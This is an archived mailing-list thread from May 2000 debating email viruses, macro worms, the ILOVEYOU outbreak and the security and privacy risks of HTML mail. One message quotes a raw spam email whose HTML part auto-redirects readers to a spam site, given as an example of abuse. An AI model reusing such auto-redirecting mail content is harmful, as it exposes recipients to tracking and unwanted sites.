RE: VIRUS WARNING
PLEASE change the title of this thread. It's borders on a partial self denial of service, since the title is now misleading. Thank you. Bill Flanigan -Original Message- From: Henry Clark [mailto:[EMAIL PROTECTED]] Sent: Sunday, May 14, 2000 4:35 PM To: Jeremy Cc: [EMAIL PROTECTED] Subject: Re: VIRUS WARNING At 01:38 PM 5/12/00 -0400, Jeremy wrote: Can you plase pleaes stop this Virus Thread. This thread _is_ the virus...
Re: VIRUS WARNING
At 01:38 PM 5/12/00 -0400, Jeremy wrote: Can you plase pleaes stop this Virus Thread. This thread _is_ the virus...
Re: VIRUS WARNING
On Fri, 12 May 2000 13:38:43 EDT, Jeremy said: Can you plase pleaes stop this Virus Thread. Actually, there *ARE* important issues here. Would the IESG support the creation of a WG to discuss these, with the charter of producing a BCP documenting what *should* be done to minimize these risks in today's internet? Talking about a WG seems premature. The first step would be to start a discussion list and maybe schedule a BOF. If those steps prove fruitful a WG would be a possibility. I can set up a mailing list if you like. Ned
RE: VIRUS WARNING
Let's see if this reasoning holds water. Imagine your favorite OS, suppose that I send you a .pl file (Perl Script). You then make the "mistake" of saving it to the file system and then proceed to running the script. What do you think that script can do?. What will you have to do to fix your problem?. This is completely analogous to changing the default selection on the "Do you want to run this document's macros" dialog from "NO" to "YES". We have become a society of excuses people, nothing is our fault. It is always somebody else's fault. WE HAVE TO TAKE RESPONSIBILITY FOR OUR OWN ACTIONS ps: if I made this stupid mistake, I will immediately check what macros are included in the forsaken document and delete them. -Original Message- From: Doug Sauder [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 5:55 PM To: Castro, Edison M. (PCA); [EMAIL PROTECTED] Subject: RE: VIRUS WARNING -Original Message- From: Castro, Edison M. (PCA) [mailto:[EMAIL PROTECTED]] That is exactly the same way that all Windows virus work. As a Windows user (as well as other OSes), I can say that people have to be responsible for their actions. Whenever you receive any Email attachment, the only way that attachment can produce any damage is if you run it. At least in my copy of MS Word anytime I open a word document and it contains any macros, Word readily ask me if I want to allow the macro to execute. Not only that, this version of Word (2000) is configured to only ask me when a signed (with a certificate of a trusted party) macro is included. Suppose you made the mistake of opening a Word document with a VBA (Visual Basic for Applications) script virus. (I did this once and I am sharing a real-life experience.) The VBA script turns off the option that disables automatically running scripts. I kid you not! Next time you open a Word document that contains a script, you won't be asked whether you want to run it. If you go into the options settings and set the option to disable running scripts, you have done nothing, because the virus script runs when you close the document and turns the option back off again. At least not allowing macros to disable the don't-run-macros option seems reasonable to me, but it seemed to have escaped the engineers who created Microsoft Word. Doug Sauder Software Engineer Broadsoft, Inc
RE: VIRUS WARNING
Oh, I agree that we have to take responsibility for our own actions. I am absolutely responsible for allowing the macro to run. After I mistakenly ran the macro, my first thought was to neutralize it -- to stop it from spreading further -- by disabling the automatic running of macros. Unfortunately, Word paid more attention to what the macro wanted, than what *I* the user wanted. I said "DON'T RUN MACROS!!". The macro said "run macros." Guess who Word listened to? Do you see the catch? It's not a matter of not being responsible. I take the blame. But MS made it much easier for the virus to get the upper hand. The don't-run-macros option is only halfway useful if you can only turn it off, but can never turn it on again. At that time I knew very little about macros. The VBA editor seemed non-intuitive to use. I tried to remove the virus by deleting the VBA script, and that took several hours of research in MS Word How-To books. I finally ended up going out to a store and buying the virus clean-up software. -- Doug Sauder Software Engineer Broadsoft, Inc -Original Message- From: Castro, Edison M. (PCA) [mailto:[EMAIL PROTECTED]] Sent: Friday, May 12, 2000 08:45 To: 'Doug Sauder'; Castro, Edison M. (PCA); [EMAIL PROTECTED] Subject: RE: VIRUS WARNING Let's see if this reasoning holds water. Imagine your favorite OS, suppose that I send you a .pl file (Perl Script). You then make the "mistake" of saving it to the file system and then proceed to running the script. What do you think that script can do?. What will you have to do to fix your problem?. This is completely analogous to changing the default selection on the "Do you want to run this document's macros" dialog from "NO" to "YES". We have become a society of excuses people, nothing is our fault. It is always somebody else's fault. WE HAVE TO TAKE RESPONSIBILITY FOR OUR OWN ACTIONS ps: if I made this stupid mistake, I will immediately check what macros are included in the forsaken document and delete them. -Original Message- From: Doug Sauder [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 5:55 PM To: Castro, Edison M. (PCA); [EMAIL PROTECTED] Subject: RE: VIRUS WARNING -Original Message- From: Castro, Edison M. (PCA) [mailto:[EMAIL PROTECTED]] That is exactly the same way that all Windows virus work. As a Windows user (as well as other OSes), I can say that people have to be responsible for their actions. Whenever you receive any Email attachment, the only way that attachment can produce any damage is if you run it. At least in my copy of MS Word anytime I open a word document and it contains any macros, Word readily ask me if I want to allow the macro to execute. Not only that, this version of Word (2000) is configured to only ask me when a signed (with a certificate of a trusted party) macro is included. Suppose you made the mistake of opening a Word document with a VBA (Visual Basic for Applications) script virus. (I did this once and I am sharing a real-life experience.) The VBA script turns off the option that disables automatically running scripts. I kid you not! Next time you open a Word document that contains a script, you won't be asked whether you want to run it. If you go into the options settings and set the option to disable running scripts, you have done nothing, because the virus script runs when you close the document and turns the option back off again. At least not allowing macros to disable the don't-run-macros option seems reasonable to me, but it seemed to have escaped the engineers who created Microsoft Word. Doug Sauder Software Engineer Broadsoft, Inc
Re: VIRUS WARNING
John Stracke wrote: Well, there's basic formatting: [...] And even simple links (never mind forms, applets, etc.) are great for, say, workflow applications. When I worked for Netscape, HR made great use of HTML mail in the internal network. When I wanted to take some Email is not the web. John
Re: VIRUS WARNING
On Fri, 12 May 2000 09:33:02 CDT, John Kristoff [EMAIL PROTECTED] said: John Stracke wrote: Well, there's basic formatting: [...] And even simple links (never mind forms, applets, etc.) are great for, say, workflow applications. When I worked for Netscape, HR made great use of HTML mail in the internal network. When I wanted to take some Email is not the web. On the other hand, e-mail does a MUCH better job of some things than the web does. In particular, if you do workflow via e-mail (especially with PGP or other authentication/encryption), you can send the object to the next person that needs it, and *NOT* expose it to the rest of the world. If you do it web-based, you then have all the ugly issues of getting it onto the webserver, setting access controls on it so that only the intended person can get at it, etc etc etc. Incidentally, this is exactly the same issue as "attach a file to an e-mail" versus "send the recipient a note, copy the file to a ftp/web server, wait for him to retrieve it, and then remember to clean it up afterwards". Let's face it guys - unless we collectively come up with a better way to do it, there's going to be a continued push towards having more "push" style interaction via e-mail. RFC1440 (Sender-Initiated File Transfer) appears to be essentially dead, and no new contenders have arrived -- Valdis Kletnieks Operating Systems Analyst Virginia Tech
Re: VIRUS WARNING
On Thu, May 11, 2000 at 08:36:52PM +0200, Jacob Palme wrote: At 10.11 -0600 0-05-11, Vernon Schryver wrote: Once you restrict HTML based email enough to be safe, why bother with anything more than text and perhaps simple pictures? What is wrong with that. I use HTML-based e-mail mostly to inluce pictures in my messages. A very useful way of using HTML-based e-mail would also be to send out forms and fill them in via mail, but this does not work so well because some mailers does not handle such messages very good yet. And of course, a day after posting my earlier reply to this message, I receive this example of how useful HTML is in E-Mail: [...] ] X-Mailer: DiffondiCool V3.1.1 (W95/NT) Delfino Solutions (Build: Nov 7 1998) ] Mime-Version: 1.0 ] Date: Fri, 12 May 2000 21:33:03 +0800 ] Content-Type: multipart/mixed; boundary="=_NextPart_000_007F_01BDF6C7.FABAC1B0" ] Content-Transfer-Encoding: 7bit ] ] This is a MIME Message ] ] --=_NextPart_000_007F_01BDF6C7.FABAC1B0 ] Content-Type: text/plain; charset="iso-8859-1" ] Content-Transfer-Encoding: quoted-printable ] ] ] --=_NextPart_000_007F_01BDF6C7.FABAC1B0 ] Content-Type: text/html; name="unknown.htm" ] Content-Transfer-Encoding: quoted-printable ] Content-Description: unknown.htm ] Content-Disposition: inline; filename="unknown.htm" ] ] htmlhead ] meta http-equiv=3D"refresh" content=3D"0;URL=3Dhttp://myad.cn99.com" ] /head/html ] ] --=_NextPart_000_007F_01BDF6C7.FABAC1B0-- Well goooleee. I wonder what that piece of crap was suppose to do. I'll bet this spammer thought I was stupid enough to be using an HTML enabled reader that would just bounce me right to his spam site where he would not only hit me with his cruft but he would also know that his E-Mail hit paydirt and he had a good address on this host. All without any active content at all. Oh well... Guess he failed on this one. How many chumps do you think he might have succeeded with? I got hit with three copies of it (various permutations of my addresses). I'll probably see more before the day is out. BTW... According to the Received-By headers, the point of origin was in .cn, so it will be a bloody cold day in hell before I'm able to do anything about this clown. Grrr... If people wouldn't use HTML readers, this trick wouldn't work at all, and I wouldn't have to tolerate this cruft (yes, I know, they would try something else but at least it wouldn't be this morally offensive). -- Jacob Palme [EMAIL PROTECTED] (Stockholm University and KTH) for more info see URL: http://www.dsv.su.se/jpalme/ Mike -- Michael H. Warfield| (770) 985-6132 | [EMAIL PROTECTED] (The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471| possible worlds. A pessimist is sure of it!
Re: VIRUS WARNING
On Fri, 12 May 2000 [EMAIL PROTECTED] wrote: Incidentally, this is exactly the same issue as "attach a file to an e-mail" versus "send the recipient a note, copy the file to a ftp/web server, wait for him to retrieve it, and then remember to clean it up afterwards". Only if the e-mail client in question automatically executes the attached file. Indeed, I don't think any of the people who are complaining about the "HTML in e-mail" issues would complain about someone sending an e-mail with an HTML file as an attachment. At least, not as I understand their arguments against it. At any rate, it is certainly not "exactly the same issue" - people have expounded upon the differences already. -=I would imagine that if 1000 Rwandan's were hacked to death AT THE EXPO, people would sure have raised a stink.=-
RE: VIRUS WARNING
Castro, Edison M. (PCA) writes: WE HAVE TO TAKE RESPONSIBILITY FOR OUR OWN ACTIONS Yeah, right ... when it comes to shouting, all this "blame the victim" has gone too far. I have users who are *illiterate*. They can click, but they can't read. They can click on little pictures and listen to greetings in their native language or view videos of relatives they haven't seen in decades. I refuse to believe this is bad. Some of my illiterate users just haven't learned to read *yet*. They will when they're old enough to go to school. However, it will be a long time before they can comprehend that the computer screen is a window into a world full of bad people who want to damage their mommy's computer. These users are here in the US. That the 'love bug' worm is believed to have originated in the Philippines should be sufficient reminder that not every potential victim is a literate English-speaking resident of North Americal or Europe. It may be that technology has no way for the network to protect villagers in Bangladesh or central Africa. However, reaching that conclusion and saying the network should not try as a matter of philosophical principle are very different. Of course capable users should protect themselves as best they can, but who is prepared to say that helpless users don't belong on our Internet? -- Dick St.Peters, [EMAIL PROTECTED] Gatekeeper, NetHeaven, Saratoga Springs, NY Saratoga/Albany/Amsterdam/BoltonLanding/Cobleskill/Greenwich/ GlensFalls/LakePlacid/NorthCreek/Plattsburgh/... Oldest Internet service based in the Adirondack-Albany region
Re: VIRUS WARNING
From: chris d koeberle [EMAIL PROTECTED] ... Indeed, I don't think any of the people who are complaining about the "HTML in e-mail" issues would complain about someone sending an e-mail with an HTML file as an attachment. At least, not as I understand their arguments against it. Just as with sending any active MIME attachment including binary UNIX programs, it depends on the attached HTML file and who sent it. As as been pointed out repeatedly and as demonstrated with a concrete example Saturday morning, attached HTML can be a significant security problem. I doubt that (probably porn) HTML spam was much of a security threat, but if you think about it for a little, you can surely see how such things can be real security problems. The practice of sending both HTML and cleartext of supposedly the same message reflects very poorly on those who do it intentionally and on those who cause MUA's to trick others into doing it unintentionally. Never mind the security issues, but consider only the wastes of disk space, CPU processing, network bandwidth, and the inevitable differences between the two versions. If the two messages were the same, then there would be no excuse for sending both. If they differ, then one must be wrong, and sending both is worse than a waste. Vernon Schryver[EMAIL PROTECTED]
Re: VIRUS WARNING
On Fri, May 12, 2000 at 12:04:08PM -0400, chris d koeberle wrote: On Fri, 12 May 2000 [EMAIL PROTECTED] wrote: Incidentally, this is exactly the same issue as "attach a file to an e-mail" versus "send the recipient a note, copy the file to a ftp/web server, wait for him to retrieve it, and then remember to clean it up afterwards". Only if the e-mail client in question automatically executes the attached file. Indeed, I don't think any of the people who are complaining about the "HTML in e-mail" issues would complain about someone sending an e-mail with an HTML file as an attachment. At least, not as I understand their arguments against it. Wrong... We object to is so strenuously that we've added global blocking filters to majordomo at our site in "taboo-body". We've had one two many come through with a hostile java script worm in it and then had a few dozen people complain that we're distributing viruses and a few hundred get burned by it. BTW... The site in question has over 70 mailing lists with almost 50,000 unique addresses subscribed to one or more lists. We can't tolerate html on the mailing lists at all, if for no other reason than the administrative headache that occurs when hostile content (active or not) propagates over any of the lists. At any rate, it is certainly not "exactly the same issue" - people have expounded upon the differences already. -=I would imagine that if 1000 Rwandan's were hacked to death AT THE EXPO, people would sure have raised a stink.=- Mike -- Michael H. Warfield| (770) 985-6132 | [EMAIL PROTECTED] (The Mad Wizard) | (770) 331-2437 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471| possible worlds. A pessimist is sure of it!
Re: VIRUS WARNING
Can you plase pleaes stop this Virus Thread. -jeremy On Fri, 12 May 2000, Vernon Schryver wrote: From: chris d koeberle [EMAIL PROTECTED] ... Indeed, I don't think any of the people who are complaining about the "HTML in e-mail" issues would complain about someone sending an e-mail with an HTML file as an attachment. At least, not as I understand their arguments against it. Just as with sending any active MIME attachment including binary UNIX programs, it depends on the attached HTML file and who sent it. As as been pointed out repeatedly and as demonstrated with a concrete example Saturday morning, attached HTML can be a significant security problem. I doubt that (probably porn) HTML spam was much of a security threat, but if you think about it for a little, you can surely see how such things can be real security problems. The practice of sending both HTML and cleartext of supposedly the same message reflects very poorly on those who do it intentionally and on those who cause MUA's to trick others into doing it unintentionally. Never mind the security issues, but consider only the wastes of disk space, CPU processing, network bandwidth, and the inevitable differences between the two versions. If the two messages were the same, then there would be no excuse for sending both. If they differ, then one must be wrong, and sending both is worse than a waste. Vernon Schryver[EMAIL PROTECTED]
RE: VIRUS WARNING
No offence here people, but whilst we are on the subject of Virus's can we change the Subject Title. I don't know who you all are and I'm getting paranoid :-) Thanks Jon 'Scared Little Puppy' -Original Message- From: Dick St.Peters [mailto:[EMAIL PROTECTED]] Sent: Friday, May 12, 2000 5:31 PM To: [EMAIL PROTECTED] Subject: RE: VIRUS WARNING Castro, Edison M. (PCA) writes: WE HAVE TO TAKE RESPONSIBILITY FOR OUR OWN ACTIONS Yeah, right ... when it comes to shouting, all this "blame the victim" has gone too far. I have users who are *illiterate*. They can click, but they can't read. They can click on little pictures and listen to greetings in their native language or view videos of relatives they haven't seen in decades. I refuse to believe this is bad. Some of my illiterate users just haven't learned to read *yet*. They will when they're old enough to go to school. However, it will be a long time before they can comprehend that the computer screen is a window into a world full of bad people who want to damage their mommy's computer. These users are here in the US. That the 'love bug' worm is believed to have originated in the Philippines should be sufficient reminder that not every potential victim is a literate English-speaking resident of North Americal or Europe. It may be that technology has no way for the network to protect villagers in Bangladesh or central Africa. However, reaching that conclusion and saying the network should not try as a matter of philosophical principle are very different. Of course capable users should protect themselves as best they can, but who is prepared to say that helpless users don't belong on our Internet? -- Dick St.Peters, [EMAIL PROTECTED] Gatekeeper, NetHeaven, Saratoga Springs, NY Saratoga/Albany/Amsterdam/BoltonLanding/Cobleskill/Greenwich/ GlensFalls/LakePlacid/NorthCreek/Plattsburgh/... Oldest Internet service based in the Adirondack-Albany region
Re: VIRUS WARNING
On Fri, 12 May 2000, Vernon Schryver wrote: As as been pointed out repeatedly and as demonstrated with a concrete example Saturday morning, attached HTML can be a significant security problem. I doubt that (probably porn) HTML spam was much of a security threat, but if you think about it for a little, you can surely see how such things can be real security problems. I think there's some confusion in terminology, here, possibly on my part. Some mail clients permit the sending of an HTML _message_, where other clients will automatically parse the HTML in the message as HTML instead of plain text. I am trying desperately to distinguish between this practice and the ability to attach HTML as a binary file. Binary attached HTML presents a subset of the risks of all binary attachments - you may, if you choose to open the attachment, be disappointed in the results. HTML as e-mail presents further risks for clients which are willing to interpret the HTML (Outlook and Outlook Express both do this in their default configuration.) -=I would imagine that if 1000 Rwandan's were hacked to death AT THE EXPO, people would sure have raised a stink.=-
Re: VIRUS WARNING
On Fri, 12 May 2000 13:38:43 EDT, Jeremy said: Can you plase pleaes stop this Virus Thread. Actually, there *ARE* important issues here. Would the IESG support the creation of a WG to discuss these, with the charter of producing a BCP documenting what *should* be done to minimize these risks in today's internet? -- Valdis Kletnieks Operating Systems Analyst Virginia Tech
RE: VIRUS WARNING
this is a good idea !! maybe the security wg could look into this. Jeff, Marcus , any comments ?? /pd -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Friday, May 12, 2000 2:05 PM To: [EMAIL PROTECTED] Subject: Re: VIRUS WARNING On Fri, 12 May 2000 13:38:43 EDT, Jeremy said: Can you plase pleaes stop this Virus Thread. Actually, there *ARE* important issues here. Would the IESG support the creation of a WG to discuss these, with the charter of producing a BCP documenting what *should* be done to minimize these risks in today's internet? -- Valdis Kletnieks Operating Systems Analyst Virginia Tech
RE: VIRUS WARNING
All of that can be done in pure ASCII. ... that is, if you speak english. You can definitely write the way of Shakespeare, but you have a tiny problem writing the way of Molière, let alone Confucius. Then, there are things that are hard to do in writing, however able is your prose. Maps and pictures, songs and recordings come to mind. There was a rationale for creating MIME. Framing the debate as ASCII versus HTML is a bit reductive. The real separation here is self-contained versus network based. Carrying a picture in a message is definitely valuable, carrying a link to a picture that is stored on some random web site creates an obvious privacy risk -- the URL itself can be the hidden communication channel that tracks you.
Re: VIRUS WARNING
In message [EMAIL PROTECTED], Einar Stefferud writes: The first of these "worm/virus/addressbookmailers" was the IBM PROFS "Chrismas Card" caper that occurred some time in the early 1990's, long before MS willfully adopted the design. It was in December, 1987. Seems to me that this beloved "feature" (giving root privs to random EMail messages) should (by now) now be fully discredited, and should be destined for extinction, if only the customers will accept its disappearance in trade for an absence of a continuing flood of these $6,000,000,000 economic loss episodes. See http://catless.ncl.ac.uk/Risks/5.80.html#subj1 for details on how it worked -- but it didn't involve any analog to 'root' privileges. When the recipient got a copy, there was an included (or attached; I don't quite remember) REXX file. (REXX was a scripting language for VM/ CMS.) The message told you that it would display a Christmas card if you ran it; most users did just that, since the note appeared to come from someone they knew. And then the file replicated itself; you all know the rest. Note the two crucial points -- it ran with the user's permissions, and it was explicitly run by the user, rather than by any automatic mechanism. --Steve Bellovin
RE: VIRUS WARNING
That is exactly the same way that all Windows virus work. As a Windows user (as well as other OSes), I can say that people have to be responsible for their actions. Whenever you receive any Email attachment, the only way that attachment can produce any damage is if you run it. At least in my copy of MS Word anytime I open a word document and it contains any macros, Word readily ask me if I want to allow the macro to execute. Not only that, this version of Word (2000) is configured to only ask me when a signed (with a certificate of a trusted party) macro is included. -Original Message- From: Steven M. Bellovin [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 7:40 AM To: [EMAIL PROTECTED] Cc: Brant Knudson; [EMAIL PROTECTED] Subject: Re: VIRUS WARNING In message [EMAIL PROTECTED], Einar Stefferud writes: The first of these "worm/virus/addressbookmailers" was the IBM PROFS "Chrismas Card" caper that occurred some time in the early 1990's, long before MS willfully adopted the design. It was in December, 1987. Seems to me that this beloved "feature" (giving root privs to random EMail messages) should (by now) now be fully discredited, and should be destined for extinction, if only the customers will accept its disappearance in trade for an absence of a continuing flood of these $6,000,000,000 economic loss episodes. See http://catless.ncl.ac.uk/Risks/5.80.html#subj1 for details on how it worked -- but it didn't involve any analog to 'root' privileges. When the recipient got a copy, there was an included (or attached; I don't quite remember) REXX file. (REXX was a scripting language for VM/ CMS.) The message told you that it would display a Christmas card if you ran it; most users did just that, since the note appeared to come from someone they knew. And then the file replicated itself; you all know the rest. Note the two crucial points -- it ran with the user's permissions, and it was explicitly run by the user, rather than by any automatic mechanism. --Steve Bellovin
Re: VIRUS WARNING
On Thu, 11 May 2000 08:24:11 EDT, "Castro, Edison M. (PCA)" said: That is exactly the same way that all Windows virus work. As a Windows user (as well as other OSes), I can say that people have to be responsible for their actions. Whenever you receive any Email attachment, the only way that attachment can produce any damage is if you run it. Well, it's worse. Melissa, the Love Bug, and the Christmas worm all required the user to take an action (click/open/run the payload). However, there's apparently ANOTHER hole Seen on a SANS posting yesterday: /Valdis -- 10 May 2000 Email viruses are now spreading WITHOUT THE USER OPENING ANY ATTACHMENT. Personal computers running Internet Explorer (IE) version 5.0 and/or Microsoft Office 2000 are vulnerable to virus attacks using most email systems, even if the email recipient opens no attachments. You don't even have to use IE; just have it installed with the default security settings. If you have not closed the hole, you can receive viruses (and spread them) by viewing or previewing malicious email without opening any attachment, or by visiting a malicious web site. The problem is caused by a programming bug in an Internet Explorer ActiveX control called scriptlet.typelib. This is by far the fastest growing virus distribution problem and ripe for a hugely destructive event - at least as large as the ILOVEYOU virus. Updating your virus detection software, while important, is not an effective solution for this problem. You must also close the hole. The hole can be closed in five minutes or less using tools available at Microsoft's security site: http://www.microsoft.com/security/bulletins/ms99-032.asp The correction script may be run directly from: http://www.microsoft.com/msdownload/iebuild/scriptlet/en/scriptlet.htm Editor's Note: Thanks to Jimmy Kuo of Network Associates and Nick FitzGerald of Computer Virus Consulting Ltd. for raising the visibility of this dangerous problem.
RE: VIRUS WARNING
I believe the one of the most important holes is html based mail, because the e-mail is processed as a webpage which can be used to download undesirable content. If you configure your e-mail browser to display all messages as text you will close this hole...You will notice my e-mails are nearly 100% text Scot -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 9:45 AM To: Castro, Edison M. (PCA) Cc: 'Steven M. Bellovin'; [EMAIL PROTECTED]; Brant Knudson; [EMAIL PROTECTED] Subject: Re: VIRUS WARNING On Thu, 11 May 2000 08:24:11 EDT, "Castro, Edison M. (PCA)" said: That is exactly the same way that all Windows virus work. As a Windows user (as well as other OSes), I can say that people have to be responsible for their actions. Whenever you receive any Email attachment, the only way that attachment can produce any damage is if you run it. Well, it's worse. Melissa, the Love Bug, and the Christmas worm all required the user to take an action (click/open/run the payload). However, there's apparently ANOTHER hole Seen on a SANS posting yesterday: /Valdis -- 10 May 2000 Email viruses are now spreading WITHOUT THE USER OPENING ANY ATTACHMENT. Personal computers running Internet Explorer (IE) version 5.0 and/or Microsoft Office 2000 are vulnerable to virus attacks using most email systems, even if the email recipient opens no attachments. You don't even have to use IE; just have it installed with the default security settings. If you have not closed the hole, you can receive viruses (and spread them) by viewing or previewing malicious email without opening any attachment, or by visiting a malicious web site. The problem is caused by a programming bug in an Internet Explorer ActiveX control called scriptlet.typelib. This is by far the fastest growing virus distribution problem and ripe for a hugely destructive event - at least as large as the ILOVEYOU virus. Updating your virus detection software, while important, is not an effective solution for this problem. You must also close the hole. The hole can be closed in five minutes or less using tools available at Microsoft's security site: http://www.microsoft.com/security/bulletins/ms99-032.asp The correction script may be run directly from: http://www.microsoft.com/msdownload/iebuild/scriptlet/en/scriptlet.htm Editor's Note: Thanks to Jimmy Kuo of Network Associates and Nick FitzGerald of Computer Virus Consulting Ltd. for raising the visibility of this dangerous problem.
RE: VIRUS WARNING
From [EMAIL PROTECTED] Thu May 11 06:36:01 2000 From: Steven M. Bellovin [mailto:[EMAIL PROTECTED]] ... Note the two crucial points -- it ran with the user's permissions, and it was explicitly run by the user, rather than by any automatic mechanism. From: "Castro, Edison M. (PCA)" [EMAIL PROTECTED] That is exactly the same way that all Windows virus work. As a Windows user (as well as other OSes), I can say that people have to be responsible for their actions. Whenever you receive any Email attachment, the only way that attachment can produce any damage is if you run it. ... Not only that, this version of Word (2000) is configured to only ask me when a signed (with a certificate of a trusted party) macro is included. There are serious mistakes in that. First, is the perhaps minor point that rumor has it that Outlook Express (as opposed to Outlook) is eager to open attachments automatically. Second, what matters is not only what configuration changes can be made to close some of the holes, but how systems are configured by default from the CDROM's and how they are most commonly configured in practice. Third, and where the first serious mistake lies, on Windows 98 the worm did not run with merely the user's permissions. That constrasts with reasonable operating systems, where much of its damage would be impossible. Forth, the most serious problem is that most computer users and many who consider themselves more than mere users have no clue what is meant by "the user's permissions." The main desktop operating system vendors can be blamed more for obscuring that notion among users than for their other crimes. It is the equivalent of refusing to equip cars with seat belts, air bags, stop lights and tail lights on grounds of "user-friendliness." Never mind that the current worm involved Visual Basic instead of Word macros. Regardless of the programming language, given the familiar "feature rich," "user friendliness," it's probably trivial for a worm to find the user's signature and sign its spawn. You wouldn't want users to need to type a passphrase, use a smart card, or anything else so complicated and user-unfriendly merely to send mail, would you? Thus, the next act in this circus will not only involve email from people you know (as this one did), but it will also be cryptographically signed by the apparent senders. Vernon Schryver[EMAIL PROTECTED]
RE: VIRUS WARNING
Scot, While what you say is true - meaning an all-text restriction on your email browser will prevent "dangerous goods" to be downloaded - it also takes away functionality. We have to find a way to be able to use html based email but restrict it from - say running scripts, executing anything, writing cookies, issuing queries, etc... Until that happens, you're right - html based email is like a runaway train. We have to invent the "brakes" now. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 10:07 AM To: [EMAIL PROTECTED]; 'Castro, Edison M. (PCA)' Cc: 'Steven M. Bellovin'; [EMAIL PROTECTED]; 'Brant Knudson'; [EMAIL PROTECTED] Subject: RE: VIRUS WARNING I believe the one of the most important holes is html based mail, because the e-mail is processed as a webpage which can be used to download undesirable content. If you configure your e-mail browser to display all messages as text you will close this hole...You will notice my e-mails are nearly 100% text Scot
RE: VIRUS WARNING
From: Lillian Komlossy [EMAIL PROTECTED] While what you say is true - meaning an all-text restriction on your email browser will prevent "dangerous goods" to be downloaded - it also takes away functionality. We have to find a way to be able to use html based email but restrict it from - say running scripts, executing anything, writing cookies, issuing queries, etc... Until that happens, you're right - html based email is like a runaway train. We have to invent the "brakes" now. Never mind the other reasons why HTML based email is considered an abomination by many who understand the issues. What you want is self-contradictory. What good is HTML based email if it cannot run scripts or even contain links to other HTML content? Once you restrict HTML based email enough to be safe, why bother with anything more than text and perhaps simple pictures? It's not only programs in email that are dangerous, but also HTTP references. Recall the recent disclosures concerning the use of unique to the target URL's of invisible pages in email and web sites instead of HTTP cookies. You want to run your freight train down a long pass with an 8% grade at 100 miles per hour, and not need to worry about it running away. Maybe someday there will be some other solution, but today the only tactics that let breaks control a train in such circumstances begin with going far less than 100 mph. You simply cannot have unbridled user-friendliness and security against bad guys. No matter what the salescritters and pointy-haired claim, security and convenience will always be at odds. Vernon Schryver[EMAIL PROTECTED]
Re: VIRUS WARNING
Lillian Komlossy wrote: We have to find a way to be able to use html based email but restrict it from - say running scripts, executing anything, writing cookies, issuing queries, etc... So turn off JavaScript for mail messages. -- /==\ |John Stracke| http://www.ecal.com |My opinions are my own.| |Chief Scientist |=| |eCal Corp. |But this one goes to 11x.| |[EMAIL PROTECTED]| | \==/
RE: VIRUS WARNING
Lillian, I am not so sure I totally agree. Why exactly do we need HTML based e-mail...Is it really necessary? E-mail is a service for transmitting a written message, and written messages certainly don't require background graphics or a full blown graphically based webpage. There are a few reasons why I believe this, one of the most compelling IMHO is that graphic content in e-mails increases the size of the e-mail exponentially, thus greatly contributing to the packet congestion already extremely evident on the Internet today. I realize that we are developing new technologies all the time that increase bandwidth, but I think its terribly inefficient, and dangerous. There is no practical need for html e-mail. It like saying I want to use a tractor trailer to commute to work everyday, but it needs to consume only as much gas as an eco car, and go as fast a Ferrari. Scot -Original Message- From: Lillian Komlossy [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 11:13 AM To: 'Scot Mc Pherson' Cc: '[EMAIL PROTECTED]' Subject: RE: VIRUS WARNING Scot, While what you say is true - meaning an all-text restriction on your email browser will prevent "dangerous goods" to be downloaded - it also takes away functionality. We have to find a way to be able to use html based email but restrict it from - say running scripts, executing anything, writing cookies, issuing queries, etc... Until that happens, you're right - html based email is like a runaway train. We have to invent the "brakes" now. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 10:07 AM To: [EMAIL PROTECTED]; 'Castro, Edison M. (PCA)' Cc: 'Steven M. Bellovin'; [EMAIL PROTECTED]; 'Brant Knudson'; [EMAIL PROTECTED] Subject: RE: VIRUS WARNING I believe the one of the most important holes is html based mail, because the e-mail is processed as a webpage which can be used to download undesirable content. If you configure your e-mail browser to display all messages as text you will close this hole...You will notice my e-mails are nearly 100% text Scot
RE: VIRUS WARNING
Scot, ITA we do not need the HTML email for our everyday use. HTML based email is mainly used by the Email-Newsletter companies, (i.e. Whitehat, Exactis, etc...) especially for advertising purposes. We can argue that we don't need it but in reality, these companies live off the daily newsletters they send out. I believe all of these newsletters are being sent out to people who actually subscribed to receive them. While the reason is mainly commercial it cannot be ignored. As far as the bandwidth is concerned - most of those HTML emails don't actually email the images but rather display it via a link from their own server. (Which of course does not help bandwidth matters especially if first the run it through a logging agent). I believe the problem starts when somebody writes an HTML email that can retrieve, write or execute anything on the receiving client's system. I agree with you - it is contradictory. So is every new technology, even the more tangible ones. I'll bet once everybody agreed that there is no need for the automobile, horses will do fine - but now we want to take our tractor-trailer to work, on an eco-car style gas-burn, and speed as fast as a Ferrari. Go figure. Lillian Komlossy Site Manager http://www.dmnews.com http://www.imarketingnews.com (212) 925-7300 ext. 232 -Original Message- From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 11, 2000 1:59 PM To: 'Lillian Komlossy' Cc: [EMAIL PROTECTED] Subject: RE: VIRUS WARNING Lillian, I am not so sure I totally agree. Why exactly do we need HTML based e-mail...Is it really necessary? E-mail is a service for transmitting a written message, and written messages certainly don't require background graphics or a full blown graphically based webpage. There are a few reasons why I believe this, one of the most compelling IMHO is that graphic content in e-mails increases the size of the e-mail exponentially, thus greatly contributing to the packet congestion already extremely evident on the Internet today. I realize that we are developing new technologies all the time that increase bandwidth, but I think its terribly inefficient, and dangerous. There is no practical need for html e-mail. It like saying I want to use a tractor trailer to commute to work everyday, but it needs to consume only as much gas as an eco car, and go as fast a Ferrari. Scot -Original Message- From: Lillian Komlossy 